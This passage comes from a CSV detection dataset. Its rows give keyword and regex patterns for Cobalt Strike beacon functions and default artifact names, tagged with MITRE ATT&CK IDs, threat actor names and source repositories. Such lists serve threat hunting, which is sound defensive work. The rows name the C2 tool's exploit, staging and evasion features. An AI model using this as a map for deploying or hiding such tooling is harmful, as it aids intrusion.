- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35683"
"*beacon_remote_exec_methods*",".{0,1000}beacon_remote_exec_methods.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35684"
"*beacon_remote_exploit*",".{0,1000}beacon_remote_exploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35685"
"*beacon_remote_exploit_arch*",".{0,1000}beacon_remote_exploit_arch.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35686"
"*beacon_remote_exploit_describe*",".{0,1000}beacon_remote_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35687"
"*beacon_remote_exploit_register*",".{0,1000}beacon_remote_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35688"
"*beacon_remote_exploits*",".{0,1000}beacon_remote_exploits.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35689"
"*beacon_smb.exe*",".{0,1000}beacon_smb\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35690"
"*Beacon_Stage_p2_Stuct*",".{0,1000}Beacon_Stage_p2_Stuct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35691"
"*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35692"
"*Beacon_Stage_Struct_p1*",".{0,1000}Beacon_Stage_Struct_p1.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35693"
"*Beacon_Stage_Struct_p3*",".{0,1000}Beacon_Stage_Struct_p3.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35694"
"*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35695"
"*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35696"
"*beacon_test.exe*",".{0,1000}beacon_test\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35697"
"*beacon_top *",".{0,1000}beacon_top\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 